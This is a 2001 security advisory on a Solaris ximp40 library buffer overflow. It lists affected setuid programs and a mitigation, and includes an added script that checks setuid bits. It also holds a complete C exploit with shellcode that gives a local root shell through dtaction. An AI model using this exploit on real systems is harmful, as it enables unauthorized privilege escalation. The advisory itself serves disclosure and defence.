From: UNYUN (shadowpenguinBACKSECTION.NET)
Date: Wed Jan 31 2001 - 07:24:32 CST


    SPS Advisory #40

    Solaris7/8 ximp40 shared library buffer overflow

    UNYUN <shadowpenguinbacksection.net>
    Shadow Penguin Security (http://shadowpenguin.backsection.net)

    --------------------------------------------------------------

    [Date]
    Jan. 30, 2001

    [Vulnerable]
    Solaris 8 Intel & Sparc edition
    Solaris 7 Intel & Sparc edition

    [Not vulnerable]
    unknown

    [Overview]
       The shared library "ximp40", which is installed on Solaris 7 and 8 by
    default, has a buffer overflow bug. A local user can obtain root
    privilege or the mail gid through the following suid/sgid programs,
    which use the shared library ximp40.

    *Solaris 8
    suid root : /usr/dt/bin/dtaction
    suid root : /usr/dt/bin/dtprintinfo
    suid root : /usr/openwin/bin/sys-suspend
    sgid mail : /usr/dt/bin/dtmail
    sgid mail : /usr/openwin/bin/mailtool

    *Solaris 7
    suid root : /usr/dt/bin/dtaction
    suid root : /usr/dt/bin/dtprintinfo
    suid root : /usr/dt/bin/dtappgather
    suid root : /usr/bin/admintool
    suid root : /usr/openwin/bin/sys-suspend
    sgid mail : /usr/dt/bin/dtmail
    sgid mail : /usr/openwin/bin/mailtool

       The exploitable buffer overflow occurs when a long string is
    passed as "arg0" of the programs listed above. The overflow
    overwrites the stack area including the saved return address, so EIP
    can be changed to a value specified inside arg0.

    [Details]
      We explain this problem using /usr/dt/bin/dtaction as installed
    on Solaris 8.
      This overflow becomes exploitable when an appropriate value is placed
    at buffer offsets 264 to 267; EIP can then be changed to the value
    located at buffer offsets 260 to 263.

    [Avoidance]
      Clear the suid/sgid bit of all programs which are listed in [Overview].
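
    As an added check for this avoidance step (not part of the original
    advisory), the POSIX shell script below reports which of the programs
    listed in [Overview] still carry a setuid or setgid bit. The path list
    is taken from the advisory; the script only reports and does not
    change any file mode.

```sh
#!/bin/sh
# Added example: report which ximp40 clients named in the advisory still
# have a setuid/setgid bit set. Path list copied from the advisory.
XIMP40_CLIENTS="/usr/dt/bin/dtaction /usr/dt/bin/dtprintinfo \
/usr/dt/bin/dtappgather /usr/bin/admintool /usr/openwin/bin/sys-suspend \
/usr/dt/bin/dtmail /usr/openwin/bin/mailtool"

# setid_flags MODESTRING
#   MODESTRING is the 10-character permission field from `ls -l`,
#   e.g. -rwsr-xr-x. Prints "suid", "sgid", "suid sgid" or "none".
#   Position 4 is the owner execute slot, position 7 the group execute
#   slot; 's' or 'S' there means the corresponding set-id bit is on.
setid_flags() {
    mode=$1
    flags=""
    case $(printf '%s' "$mode" | cut -c4) in
        s|S) flags="suid" ;;
    esac
    case $(printf '%s' "$mode" | cut -c7) in
        s|S) flags="${flags:+$flags }sgid" ;;
    esac
    printf '%s\n' "${flags:-none}"
}

# check_ximp40_clients
#   Walks the advisory's list, skips programs that are not installed,
#   prints one line per installed program and returns 1 if any of them
#   still has a set-id bit (0 otherwise). Uses `ls -ld` rather than
#   `stat` so it also works on Solaris.
check_ximp40_clients() {
    status=0
    for f in $XIMP40_CLIENTS; do
        [ -e "$f" ] || continue
        mode=$(ls -ld "$f" | cut -c1-10)
        flags=$(setid_flags "$mode")
        if [ "$flags" != none ]; then
            echo "STILL SET ($flags): $f"
            status=1
        else
            echo "ok: $f"
        fi
    done
    return $status
}

if check_ximp40_clients; then
    echo "no installed ximp40 client carries a setuid/setgid bit"
else
    echo "some ximp40 clients still need their suid/sgid bits cleared"
fi
```

    Running it after applying the chmod changes confirms that every listed
    program now reports "ok".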

    [Caution]
       We will change this information without any notice. Use of this
    information constitutes acceptance for use in an AS IS condition.
    There are NO warranties with regard to this information. In no event
    shall the author be liable for any damages whatever arising out of or
    in connection with the use or spread of this information. Any use of
    this information is only for personal experiment.

    [Comments ?]
    If you have any comments, please send them to the following address.

    UNYUN <shadowpenguinbacksection.net>
    http://shadowpenguin.backsection.net

    [Sample code]
       This exploit obtains root privilege by using /usr/dt/bin/dtaction.
    It has been tested on the Solaris 8 Intel edition only.

    /*====================================================================
       Solaris ximp40 shared library exploit for Solaris8 Intel Edition
       The Shadow Penguin Security (http://shadowpenguin.backsection.net)
       Written by UNYUN (shadowpenguinbacksection.net)
       [usage]
        #xhost +targethost
        #telnet targethost
        ...
        %setenv DISPLAY yourhost:0.0
        %gcc ximp40.c
        %./a.out
        0:Default value 1:Calculated value > 1 <- Input 0 or 1
      ====================================================================
    */

    #include <stdio.h>
    #include <string.h>   /* memset, memcpy, strlen */
    #include <unistd.h>   /* execl */

    #define BUF_SIZE 272
    #define EIP_OFFSET 260        /* offset of the saved return address in arg0 */
    #define FAKE_OFFSET 264       /* offset of the value described in [Details] */
    #define FAKE_VALUE 0x08046dec
    #define EIP_VALUE 0x08047cb4
    #define FAKE_VALUE_DIF 0xd9c
    #define EIP_VALUE_DIF 0x12c
    #define NOP 0x90

    char shell_code[]=
      "\xeb\x3b\x9a\xff\xff\xff\xff\x07\xff\xc3\x5e\x31\xc0\x89\x46\xc1"
      "\x88\x46\xc6\x88\x46\x07\x89\x46\x0c\x31\xc0\x50\xb0\x17\xe8\xdf"
      "\xff\xff\xff\x83\xc4\x04\x31\xc0\x50\x8d\x5e\x08\x53\x8d\x1e\x89"
      "\x5e\x08\x53\xb0\x3b\xe8\xc8\xff\xff\xff\x83\xc4\x0c\xe8\xc8\xff"
      "\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\xff\xff\xff\xff\xff\xff\xff"
      "\xff\xff";

    /* Return the current stack pointer (i386 only). */
    unsigned long get_sp(void)
    {
      unsigned long sp;
      __asm__(" movl %%esp,%0 " : "=r"(sp));
      return sp;
    }

    /* Store a 32-bit value at p in little-endian byte order. */
    void valset(char *p,unsigned int val)
    {
        *p=val&0xff;
        *(p+1)=(val>>8)&0xff;
        *(p+2)=(val>>16)&0xff;
        *(p+3)=(val>>24)&0xff;
    }

    int main(void)
    {
        char buf[BUF_SIZE];
        unsigned int esp=get_sp(),sw;

        /* Fill arg0 with NOPs and place the shellcode just below the saved EIP. */
        memset(buf,NOP,BUF_SIZE);
        memcpy(buf+EIP_OFFSET-strlen(shell_code),shell_code,
               strlen(shell_code));

        printf("esp=%x\n",esp);
        printf("0:Default value 1:Calculated value >");
        fflush(stdout);
        if (scanf("%u",&sw)!=1) sw=0;
        if (sw==0){
            /* Fixed addresses observed on the tested Solaris 8 Intel system */
            valset(buf+FAKE_OFFSET, FAKE_VALUE);
            valset(buf+EIP_OFFSET , EIP_VALUE);
            printf("Jumping address = %x\n",EIP_VALUE);
        }else{
            /* Addresses derived from the current stack pointer */
            valset(buf+FAKE_OFFSET, esp-FAKE_VALUE_DIF);
            valset(buf+EIP_OFFSET , esp+EIP_VALUE_DIF);
            printf("Jumping address = %x\n",esp+EIP_VALUE_DIF);
        }
        buf[BUF_SIZE-1]=0;   /* arg0 must be a NUL-terminated string */

        execl("/usr/dt/bin/dtaction",buf,(char *)NULL);
        perror("execl");     /* only reached if the exec itself fails */
        return 1;
    }

    -----
    UNYUN
    % The Shadow Penguin Security [ http://shadowpenguin.backsection.net ]
       shadowpenguinbacksection.net (SPS-Official)
       unyunshadowpenguin.org (Personal)
    % eEye Digital Security Team [ http://www.eEye.com ]
       unyuneEye.com